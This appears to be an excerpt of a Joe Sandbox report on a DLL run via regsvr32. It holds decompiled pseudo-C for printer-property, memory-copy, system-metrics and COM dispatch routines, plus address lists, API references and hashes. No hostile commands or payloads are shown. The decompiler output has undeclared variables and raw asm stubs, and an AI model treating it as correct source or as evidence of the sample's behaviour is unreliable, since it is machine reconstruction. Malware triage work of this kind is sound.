                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItem$Remove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3494307843-0
                                                                                                                • Opcode ID: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
                                                                                                                • Instruction ID: d18577bb6ad9008869b906b4cf11c4d394a577308c1e0308ffc8e2554ca28334
                                                                                                                • Opcode Fuzzy Hash: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
                                                                                                                • Instruction Fuzzy Hash: 78119A32109324ABF211DB11CD49E6FBBE8FFC2AC4F114B5AF585A2014D631AE919B67
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001945B Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001945B(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10021AAD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10021AAD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                                0x1001945e
                                                                                                                0x10019460
                                                                                                                0x10019462
                                                                                                                0x1001946a
                                                                                                                0x10019484
                                                                                                                0x1001948c
                                                                                                                0x10019496
                                                                                                                0x1001949d
                                                                                                                0x1001949f
                                                                                                                0x100194a4
                                                                                                                0x100194a7
                                                                                                                0x100194a7
                                                                                                                0x100194be
                                                                                                                0x100194c5
                                                                                                                0x100194dd
                                                                                                                0x100194e2
                                                                                                                0x100194e7
                                                                                                                0x100194e7
                                                                                                                0x100194ed
                                                                                                                0x100194ed
                                                                                                                0x1001949d
                                                                                                                0x100194f2
                                                                                                                0x100194f6

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 10019478
                                                                                                                • lstrcmpA.KERNEL32(?,?), ref: 10019484
                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10019496
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194B6
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194BE
                                                                                                                • GlobalLock.KERNEL32 ref: 100194C8
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100194D5
                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100194ED
                                                                                                                  • Part of subcall function 10021AAD: GlobalFlags.KERNEL32(?), ref: 10021AB8
                                                                                                                  • Part of subcall function 10021AAD: GlobalUnlock.KERNEL32(?,?,00000000,100194E7,?,00000000,?,?,00000000,00000000,00000002), ref: 10021ACA
                                                                                                                  • Part of subcall function 10021AAD: GlobalFree.KERNEL32(?), ref: 10021AD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 168474834-0
                                                                                                                • Opcode ID: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
                                                                                                                • Instruction ID: 2d086dcef950c7a74b8bae95a46a9c9ef594960c6ce8d9f37c1e1a3c87edc55f
                                                                                                                • Opcode Fuzzy Hash: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
                                                                                                                • Instruction Fuzzy Hash: 57119A75900600BFDB12DBA9CC89CAF7BFEFF85B407008419FA42D6021DA3AE991D724
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A992 Relevance: 12.1, APIs: 8, Instructions: 51memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A992(void* __ecx, void* _a4, void* _a8) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t10;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t25;
				void* _t32;

				_t25 = GlobalSize;
				_t10 = GlobalSize(_a8);
				_t21 = _a4;
				_v8 = _t10;
				if(_t21 != 0) {
					if(_v8 > GlobalSize(_t21)) {
						goto L2;
					} else {
						goto L4;
					}
				} else {
					_t21 = GlobalAlloc(0x2002, _t10);
					if(_t21 != 0) {
						L4:
						_a4 = GlobalLock(_a8);
						_t14 = GlobalLock(_t21);
						E1000A7FB(_t25, _t14, _t32, _t14, GlobalSize(_t21), _a4, _v8);
						GlobalUnlock(_t21);
						GlobalUnlock(_a8);
						_t12 = _t21;
					} else {
						L2:
						_t12 = 0;
					}
				}
				return _t12;
			}













                                                                                                                0x1000a99b
                                                                                                                0x1000a9a1
                                                                                                                0x1000a9a3
                                                                                                                0x1000a9a8
                                                                                                                0x1000a9ab
                                                                                                                0x1000a9c9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a9ad
                                                                                                                0x1000a9b9
                                                                                                                0x1000a9bd
                                                                                                                0x1000a9cb
                                                                                                                0x1000a9d8
                                                                                                                0x1000a9db
                                                                                                                0x1000a9ea
                                                                                                                0x1000a9f9
                                                                                                                0x1000a9fe
                                                                                                                0x1000aa00
                                                                                                                0x1000a9bf
                                                                                                                0x1000a9bf
                                                                                                                0x1000a9bf
                                                                                                                0x1000a9bf
                                                                                                                0x1000a9bd
                                                                                                                0x1000aa06

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Size$LockUnlock$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2344174106-0
                                                                                                                • Opcode ID: 68c3b1503e6096a580e2b1701591606604cd8a8eb4d294ae4fb7ad5acf0b0275
                                                                                                                • Instruction ID: 424b07d498546e24803fdd6aa96bd475ff3c4902c72b310acdb31ba6b224f7f9
                                                                                                                • Opcode Fuzzy Hash: 68c3b1503e6096a580e2b1701591606604cd8a8eb4d294ae4fb7ad5acf0b0275
                                                                                                                • Instruction Fuzzy Hash: 4F018471A00218BFEB01AF66CD84C9FBFACEF462E07058166FD0497211D6759E50DAA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100212D3 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100212D3(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x100bdc78 = GetSystemMetrics(2) + 1;
				 *0x100bdc7c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}





                                                                                                                0x100212de
                                                                                                                0x100212e4
                                                                                                                0x100212eb
                                                                                                                0x100212f3
                                                                                                                0x100212fd
                                                                                                                0x1002130e
                                                                                                                0x10021318
                                                                                                                0x10021320
                                                                                                                0x1002132c

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 100212E0
                                                                                                                • GetSystemMetrics.USER32 ref: 100212E7
                                                                                                                • GetSystemMetrics.USER32 ref: 100212EE
                                                                                                                • GetSystemMetrics.USER32 ref: 100212F8
                                                                                                                • GetDC.USER32(00000000), ref: 10021302
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 10021313
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002131B
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10021323
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1151147025-0
                                                                                                                • Opcode ID: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
                                                                                                                • Instruction ID: f7b543dd6023dbd25c52ffe13c507f1655c341cfc04319cd9b5f75389163816c
                                                                                                                • Opcode Fuzzy Hash: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
                                                                                                                • Instruction Fuzzy Hash: 92F03675A40714AEF7206F718C89F677BA4EFC5751F01455AE6418B1D0DAB59801CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A9E4 Relevance: 10.9, APIs: 7, Instructions: 383COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E1003A9E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t160;
				CHAR* _t162;
				CHAR* _t165;
				CHAR* _t168;
				CHAR* _t174;
				CHAR* _t176;
				char _t178;
				CHAR* _t179;
				signed int _t188;
				signed int _t195;
				CHAR* _t198;
				signed int _t200;
				intOrPtr* _t205;
				CHAR* _t207;
				CHAR* _t208;
				int _t209;
				intOrPtr* _t214;
				CHAR* _t217;
				intOrPtr _t221;
				CHAR* _t223;
				CHAR* _t237;
				CHAR* _t245;
				CHAR* _t246;
				CHAR* _t248;
				void* _t252;
				void* _t253;

				_push(0x60);
				E10047680(0x10090faa, __ebx, __edi, __esi);
				_t214 =  *(_t252 + 8) + 0xfffffff0;
				 *((intOrPtr*)(_t252 - 0x1c)) = _t214;
				if( *(_t252 + 0x1c) != 0) {
					__eflags =  *(_t252 + 0x20);
					if(__eflags != 0) {
						E100235FF( *(_t252 + 0x20));
					}
					_t160 = E1001085C(__eflags,  *((intOrPtr*)(_t252 + 0x10)), 0x100a47bc);
					__eflags = _t160;
					if(_t160 != 0) {
						_t162 =  *((intOrPtr*)( *_t214 + 0x14))( *((intOrPtr*)(_t252 + 0xc)));
						__eflags = _t162;
						if(_t162 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							__eflags =  *(_t252 - 0x30);
							if( *(_t252 - 0x30) == 0) {
								L12:
								_t245 = E1003998A(_t214,  *((intOrPtr*)(_t252 + 0xc)));
								__eflags = _t245;
								 *(_t252 + 0x1c) = _t245;
								if(_t245 != 0) {
									__eflags =  *(_t252 + 0x18) - 1;
									if( *(_t252 + 0x18) != 1) {
										L27:
										_t165 =  *(_t252 + 0x18) & 0x0000000c;
										__eflags = _t165;
										 *(_t252 - 0x20) = _t165;
										if(_t165 == 0) {
											L31:
											 *(_t252 - 0x18) =  *(_t252 - 0x18) | 0xffffffff;
											 *(_t252 - 0x14) = 0;
											 *((short*)(_t252 - 0x6c)) = 0xa;
											E100235FF(_t252 - 0x5c);
											__eflags =  *(_t252 + 0x18) - 4;
											if( *(_t252 + 0x18) != 4) {
												L51:
												_t246 =  *(_t252 + 0x1c);
												L52:
												_t168 =  *(_t252 - 0x34);
												_t217 = 0;
												__eflags =  *(_t252 + 0x18) & 0x00000003;
												 *(_t252 + 0x1c) = _t168;
												if(( *(_t252 + 0x18) & 0x00000003) == 0) {
													L63:
													__eflags = _t168 - 1;
													if(_t168 <= 1) {
														L67:
														__eflags = _t246[0x10];
														if(_t246[0x10] != 0) {
															L71:
															_t221 =  *((intOrPtr*)(_t252 - 0x1c));
															 *(_t252 + 8) =  *(_t221 + 0x14);
															__eflags =  *(_t252 + 0x20);
															 *(_t252 - 4) = 0;
															 *(_t221 + 0x14) = 0 |  *(_t252 + 0x20) != 0x00000000;
															__eflags = _t246[0x10];
															_push(_t252 - 0x18);
															if(__eflags != 0) {
																_push(_t252 - 0x3c);
																_push( *(_t252 + 0x20));
																_push( *(_t252 + 0x18));
																_push(_t246);
																_t174 = E1003A2DF(_t217, _t221, _t231, 0, _t246, __eflags);
																L76:
																_t217 = _t174;
																L77:
																 *(_t252 - 4) =  *(_t252 - 4) | 0xffffffff;
																__eflags = _t217;
																_t237 =  *(_t252 + 0x20);
																 *( *((intOrPtr*)(_t252 - 0x1c)) + 0x14) =  *(_t252 + 8);
																if(_t217 != 0) {
																	L87:
																	__eflags =  *(_t252 - 0x14);
																	if( *(_t252 - 0x14) != 0) {
																		__imp__#9( *(_t252 - 0x3c));
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																	}
																	__eflags = _t217;
																	if(_t217 != 0) {
																		_t223 =  *(_t252 + 0x28);
																		__eflags = _t223;
																		if(_t223 != 0) {
																			_t178 =  *(_t252 - 0x18);
																			__eflags = _t178 - 0xffffffff;
																			if(_t178 != 0xffffffff) {
																				 *_t223 = _t178;
																			}
																		}
																	}
																	_t176 = _t217;
																	goto L94;
																} else {
																	_t179 =  *(_t252 + 0x1c);
																	__eflags = _t179 -  *(_t252 - 0x34);
																	if(_t179 <=  *(_t252 - 0x34)) {
																		goto L87;
																	}
																	__eflags =  *_t237 - 9;
																	if( *_t237 != 9) {
																		L86:
																		_t217 = 0x80020005;
																		goto L87;
																	}
																	_t248 = _t237[8];
																	__eflags = _t248;
																	if(_t248 == 0) {
																		goto L86;
																	}
																	 *(_t252 - 0x34) = _t179;
																	__eflags = _t237 - _t252 - 0x5c;
																	if(_t237 == _t252 - 0x5c) {
																		_t237 = 0;
																		__eflags = 0;
																	} else {
																		E100235FF(_t237);
																	}
																	_t217 =  *((intOrPtr*)( *_t248 + 0x18))(_t248, 0,  *((intOrPtr*)(_t252 + 0x10)),  *((intOrPtr*)(_t252 + 0x14)),  *(_t252 + 0x18), _t252 - 0x3c, _t237,  *((intOrPtr*)(_t252 + 0x24)),  *(_t252 + 0x28));
																	 *((intOrPtr*)( *_t248 + 8))(_t248);
																	goto L87;
																}
															}
															__eflags =  *(_t252 - 0x34);
															if(__eflags != 0) {
																_push(_t252 - 0x3c);
																_push(_t246);
																_t174 = E10039799(_t217, _t221, 0, _t246, __eflags);
																goto L76;
															}
															_push( *(_t252 + 0x20));
															_push(_t246);
															E10039EAD(_t221);
															goto L77;
														}
														__eflags = _t168;
														if(_t168 != 0) {
															goto L71;
														}
														__eflags =  *(_t252 + 0x20);
														if( *(_t252 + 0x20) != 0) {
															goto L71;
														}
														_t217 = 0x8002000f;
														goto L87;
													}
													__eflags =  *(_t252 - 0x20);
													if( *(_t252 - 0x20) == 0) {
														goto L67;
													}
													__eflags = _t246[0x10];
													if(_t246[0x10] != 0) {
														goto L71;
													}
													_t217 = 0x8002000e;
													goto L87;
												}
												__eflags =  *(_t252 + 0x18) & 0x00000001;
												if(( *(_t252 + 0x18) & 0x00000001) != 0) {
													L58:
													__eflags = _t246[8];
													if(_t246[8] != 0) {
														goto L63;
													}
													__eflags = _t168;
													if(_t168 <= 0) {
														goto L63;
													}
													__eflags = _t246[0xc] - 9;
													if(_t246[0xc] != 9) {
														L55:
														_t176 = 0x8002000e;
														goto L94;
													}
													_t168 = 0;
													__eflags =  *(_t252 + 0x20);
													 *(_t252 - 0x34) = 0;
													if( *(_t252 + 0x20) != 0) {
														goto L67;
													}
													 *(_t252 + 0x20) = _t252 - 0x5c;
													goto L63;
												}
												__eflags = _t246[0xc];
												if(_t246[0xc] != 0) {
													__eflags =  *(_t252 + 0x20);
													if( *(_t252 + 0x20) != 0) {
														goto L58;
													}
													_t176 = 0x8002000f;
													goto L94;
												}
												goto L55;
											}
											_t188 =  *(_t252 - 0x3c);
											__eflags =  *_t188 - 9;
											if( *_t188 != 9) {
												L35:
												_t246 =  *(_t252 + 0x1c);
												__eflags = _t246[0xc] - 9;
												if(_t246[0xc] != 9) {
													goto L52;
												}
												E10049170(0, _t252 - 0x4c, 0, 0x10);
												__eflags = _t246[8];
												_push( *(_t252 + 0x28));
												_push( *((intOrPtr*)(_t252 + 0x24)));
												_push(_t252 - 0x5c);
												_t231 = _t252 - 0x4c;
												_push(_t252 - 0x4c);
												_push(3);
												_push( *((intOrPtr*)(_t252 + 0x14)));
												_push( *((intOrPtr*)(_t252 + 0x10)));
												_push( *((intOrPtr*)(_t252 + 0xc)));
												if(_t246[8] != 0) {
													 *((intOrPtr*)(_t252 - 0x4c)) =  *(_t252 - 0x3c) + 0x10;
													 *(_t252 - 0x44) =  *(_t252 - 0x34) - 1;
													_t195 =  *(_t252 + 8);
													_t217 =  *((intOrPtr*)( *_t195 + 0x18))(_t195);
													__eflags = _t217;
													if(_t217 != 0) {
														L47:
														__imp__#9(_t252 - 0x5c);
														__eflags = _t217 - 0x80020003;
														if(_t217 != 0x80020003) {
															goto L87;
														}
														L48:
														__eflags = _t217 - 0x80020003;
														if(_t217 != 0x80020003) {
															goto L87;
														}
														__eflags =  *(_t252 - 0x14);
														if( *(_t252 - 0x14) != 0) {
															 *(_t252 - 0x14) =  *(_t252 - 0x14) & 0x00000000;
															__imp__#9( *(_t252 - 0x3c));
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
														}
														goto L51;
													}
													__eflags =  *(_t252 - 0x5c) - 9;
													if( *(_t252 - 0x5c) != 9) {
														L44:
														_t217 = 0x80020005;
														goto L47;
													}
													_t198 =  *(_t252 - 0x54);
													__eflags = _t198;
													if(_t198 != 0) {
														_push( *(_t252 + 0x28));
														_push( *((intOrPtr*)(_t252 + 0x24)));
														_push( *(_t252 + 0x20));
														asm("movsd");
														asm("movsd");
														_t231 = _t252 - 0x4c;
														_push(_t252 - 0x4c);
														_push(4);
														_push( *((intOrPtr*)(_t252 + 0x14)));
														asm("movsd");
														_push( *((intOrPtr*)(_t252 + 0x10)));
														asm("movsd");
														 *(_t252 - 0x44) =  *(_t252 - 0x30);
														_push(0);
														L46:
														_t217 =  *((intOrPtr*)( *_t198 + 0x18))(_t198);
														goto L47;
													}
													goto L44;
												}
												_t200 =  *(_t252 + 8);
												_t217 =  *((intOrPtr*)( *_t200 + 0x18))(_t200);
												__eflags = _t217;
												if(_t217 != 0) {
													goto L47;
												}
												__eflags =  *(_t252 - 0x5c) - 9;
												if( *(_t252 - 0x5c) != 9) {
													goto L44;
												}
												_t198 =  *(_t252 - 0x54);
												__eflags = _t198;
												if(_t198 == 0) {
													goto L44;
												}
												_push( *(_t252 + 0x28));
												_t231 = _t252 - 0x3c;
												_push( *((intOrPtr*)(_t252 + 0x24)));
												_push( *(_t252 + 0x20));
												_push(_t252 - 0x3c);
												_push(4);
												_push( *((intOrPtr*)(_t252 + 0x14)));
												_push( *((intOrPtr*)(_t252 + 0x10)));
												_push(0);
												goto L46;
											}
											__eflags =  *(_t188 + 8);
											if( *(_t188 + 8) == 0) {
												goto L35;
											}
											asm("movsd");
											asm("movsd");
											asm("movsd");
											 *(_t252 - 0x14) = _t188;
											asm("movsd");
											E100235FF(_t188);
											E10049170(_t252 - 0x6c, _t252 - 0x4c, 0, 0x10);
											_t205 =  *((intOrPtr*)(_t252 - 0x64));
											_t253 = _t253 + 0xc;
											_t231 = _t252 - 0x4c;
											_t217 =  *((intOrPtr*)( *_t205 + 0x18))(_t205, 0,  *((intOrPtr*)(_t252 + 0x10)),  *((intOrPtr*)(_t252 + 0x14)), 2, _t252 - 0x4c,  *(_t252 - 0x3c),  *((intOrPtr*)(_t252 + 0x24)),  *(_t252 + 0x28));
											__eflags = _t217;
											if(_t217 != 0) {
												goto L48;
											}
											goto L35;
										}
										__eflags = _t245[0x10];
										 *(_t252 + 0x20) = 0;
										if(_t245[0x10] == 0) {
											goto L31;
										}
										__eflags = _t245[0x14];
										if(_t245[0x14] != 0) {
											goto L31;
										}
										_t176 = 0x80020005;
										goto L94;
									}
									_t207 = _t245[0x10];
									__eflags = _t207;
									if(_t207 != 0) {
										L20:
										__eflags = _t245[0x14];
										if(_t245[0x14] == 0) {
											goto L27;
										}
										L21:
										_t208 = _t245[8];
										__eflags = _t208;
										if(_t208 == 0) {
											_t209 = 0;
											__eflags = 0;
										} else {
											_t209 = lstrlenA(_t208);
										}
										__eflags =  *(_t252 - 0x34) - _t209;
										if( *(_t252 - 0x34) > _t209) {
											 *(_t252 + 0x18) = 8;
											 *(_t252 - 0x30) = 1;
										} else {
											 *(_t252 + 0x18) = 2;
										}
										goto L27;
									}
									__eflags = _t245[0x14];
									if(_t245[0x14] == 0) {
										goto L21;
									}
									__eflags = _t207;
									if(_t207 != 0) {
										goto L20;
									}
									__eflags = _t245[0x14];
									if(_t245[0x14] != 0) {
										goto L21;
									}
									__eflags = _t207;
									if(_t207 == 0) {
										goto L27;
									}
									goto L20;
								}
								_t176 = 0x80020003;
								goto L94;
							}
							__eflags =  *(_t252 - 0x30) - 1;
							if( *(_t252 - 0x30) != 1) {
								L11:
								_t176 = 0x80020007;
								goto L94;
							}
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 - 0x38)))) - 0xfffffffd;
							if( *((intOrPtr*)( *((intOrPtr*)(_t252 - 0x38)))) == 0xfffffffd) {
								goto L12;
							}
							goto L11;
						}
						_t176 = 0x8000ffff;
						goto L94;
					}
					_t176 = 0x80020001;
					goto L94;
				} else {
					_t176 = 0x80070057;
					L94:
					return E10047725(_t176);
				}
			}





























                                                                                                                0x1003a9e4
                                                                                                                0x1003a9eb
                                                                                                                0x1003a9f6
                                                                                                                0x1003a9fb
                                                                                                                0x1003a9fe
                                                                                                                0x1003aa0a
                                                                                                                0x1003aa0e
                                                                                                                0x1003aa13
                                                                                                                0x1003aa13
                                                                                                                0x1003aa20
                                                                                                                0x1003aa25
                                                                                                                0x1003aa29
                                                                                                                0x1003aa3c
                                                                                                                0x1003aa3f
                                                                                                                0x1003aa41
                                                                                                                0x1003aa50
                                                                                                                0x1003aa51
                                                                                                                0x1003aa52
                                                                                                                0x1003aa53
                                                                                                                0x1003aa56
                                                                                                                0x1003aa59
                                                                                                                0x1003aa73
                                                                                                                0x1003aa7c
                                                                                                                0x1003aa7e
                                                                                                                0x1003aa80
                                                                                                                0x1003aa83
                                                                                                                0x1003aa92
                                                                                                                0x1003aa96
                                                                                                                0x1003aae0
                                                                                                                0x1003aae3
                                                                                                                0x1003aae3
                                                                                                                0x1003aae6
                                                                                                                0x1003aae9
                                                                                                                0x1003ab02
                                                                                                                0x1003ab02
                                                                                                                0x1003ab0a
                                                                                                                0x1003ab0d
                                                                                                                0x1003ab13
                                                                                                                0x1003ab18
                                                                                                                0x1003ab1d
                                                                                                                0x1003ac95
                                                                                                                0x1003ac95
                                                                                                                0x1003ac98
                                                                                                                0x1003ac98
                                                                                                                0x1003ac9d
                                                                                                                0x1003ac9f
                                                                                                                0x1003aca3
                                                                                                                0x1003aca6
                                                                                                                0x1003aced
                                                                                                                0x1003aced
                                                                                                                0x1003acf0
                                                                                                                0x1003ad07
                                                                                                                0x1003ad07
                                                                                                                0x1003ad0a
                                                                                                                0x1003ad1f
                                                                                                                0x1003ad1f
                                                                                                                0x1003ad25
                                                                                                                0x1003ad2a
                                                                                                                0x1003ad2d
                                                                                                                0x1003ad33
                                                                                                                0x1003ad36
                                                                                                                0x1003ad3c
                                                                                                                0x1003ad3d
                                                                                                                0x1003ad5e
                                                                                                                0x1003ad5f
                                                                                                                0x1003ad62
                                                                                                                0x1003ad65
                                                                                                                0x1003ad66
                                                                                                                0x1003ad6b
                                                                                                                0x1003ad6b
                                                                                                                0x1003ad6d
                                                                                                                0x1003ad6d
                                                                                                                0x1003add5
                                                                                                                0x1003addd
                                                                                                                0x1003ade0
                                                                                                                0x1003ade3
                                                                                                                0x1003ae39
                                                                                                                0x1003ae39
                                                                                                                0x1003ae3d
                                                                                                                0x1003ae42
                                                                                                                0x1003ae4e
                                                                                                                0x1003ae4f
                                                                                                                0x1003ae50
                                                                                                                0x1003ae51
                                                                                                                0x1003ae51
                                                                                                                0x1003ae52
                                                                                                                0x1003ae54
                                                                                                                0x1003ae56
                                                                                                                0x1003ae59
                                                                                                                0x1003ae5b
                                                                                                                0x1003ae5d
                                                                                                                0x1003ae60
                                                                                                                0x1003ae63
                                                                                                                0x1003ae65
                                                                                                                0x1003ae65
                                                                                                                0x1003ae63
                                                                                                                0x1003ae5b
                                                                                                                0x1003ae67
                                                                                                                0x00000000
                                                                                                                0x1003ade5
                                                                                                                0x1003ade5
                                                                                                                0x1003ade8
                                                                                                                0x1003adeb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aded
                                                                                                                0x1003adf1
                                                                                                                0x1003ae34
                                                                                                                0x1003ae34
                                                                                                                0x00000000
                                                                                                                0x1003ae34
                                                                                                                0x1003adf3
                                                                                                                0x1003adf6
                                                                                                                0x1003adf8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003adfa
                                                                                                                0x1003ae00
                                                                                                                0x1003ae02
                                                                                                                0x1003ae0c
